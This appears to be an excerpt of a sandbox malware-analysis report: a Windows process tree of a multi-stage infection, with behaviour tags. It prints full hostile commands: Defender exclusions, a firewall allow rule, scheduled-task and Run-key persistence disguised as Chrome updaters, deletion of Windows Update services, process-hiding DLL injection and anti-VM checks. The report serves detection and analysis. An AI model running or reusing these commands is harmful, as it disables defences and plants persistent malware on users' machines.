      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1176
        6⤵
        Program crash
        
        PID:3480
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1268
        6⤵
        Program crash
        
        PID:3460
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1308
        6⤵
        Program crash
        
        PID:2224
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1468
        6⤵
        Program crash
        
        PID:4580
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000310001\setup.exe" & exit
        6⤵
        
        PID:4556
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "setup.exe" /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2772
    - - C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4128
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\Octium.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Octium.exe"
        7⤵
        
        PID:820
        
        C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TaskMnr.exe"
        7⤵
        
        PID:1028
    - - C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Adds Run key to start application
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4412
      - C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
        
        C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3328
    - - C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Drops file in Drivers directory
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1044
    - - C:\Users\Admin\AppData\Local\Temp\1000311001\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000311001\toolspub2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4872
      - C:\Users\Admin\AppData\Local\Temp\1000311001\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000311001\toolspub2.exe"
        6⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:4616
    - - C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2140
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:4568
    - - C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1076
    - - C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Drops file in Drivers directory
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:680
    - - C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4956
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:3608
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:2136
    - - C:\Users\Admin\AppData\Local\Temp\1000312001\3eef203fb515bda85f514e168abb5973.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000312001\3eef203fb515bda85f514e168abb5973.exe"
        5⤵
        Executes dropped EXE
        
        PID:4332
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:3016
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:216
      - C:\Users\Admin\AppData\Local\Temp\1000312001\3eef203fb515bda85f514e168abb5973.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000312001\3eef203fb515bda85f514e168abb5973.exe"
        6⤵
        
        PID:1896
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:4772
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:1268
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:2996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:4592
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        7⤵
        
        PID:452
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:436
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        8⤵
        Creates scheduled task(s)
        
        PID:4048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:4652
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        8⤵
        
        PID:5012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        8⤵
        
        PID:2296
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        8⤵
        Creates scheduled task(s)
        
        PID:4724
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        8⤵
        
        PID:4424
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        9⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        10⤵
        Launches sc.exe
        
        PID:2384
    - - C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4344
    - - C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Drops file in Drivers directory
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2304
- - C:\Users\Admin\AppData\Local\Temp\XandETC.exe
    "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
    3⤵
    - Executes dropped EXE
    PID:2312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:740
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4216
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3476
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4556
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3212
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3068
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:868
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4072
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1924
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1372
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:340
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5100
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4508
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:3200
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:2052
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4304
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3208
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1328
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4404
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1268
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4104
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4580
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:208
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5012
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2904
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2096
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3296
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3100
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2288
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1900
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2720
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1052
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1672
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2296
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1428
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5100
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:216
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:4448
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:5028
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:3968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
  2⤵
  PID:1532
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Program Files directory
    PID:2312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:1220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:4352
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:628
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4700
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:452
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:1576
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:1560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:2280
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:584
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:2264
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:3896
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:2416
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:2624
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:3096
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1544
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:3672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:2636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  PID:2788
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:208
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1560
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:3864
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:3892
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:3048
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:1544
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:3484
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4352
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3756
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4392
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4216
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2140
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:200
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:2136
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:5104
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:464
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:2796
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:4916
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:704
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1352
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1328
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3492
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2812
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe zuhwtyqtfkk
  2⤵
  PID:3788
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:424
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:3248
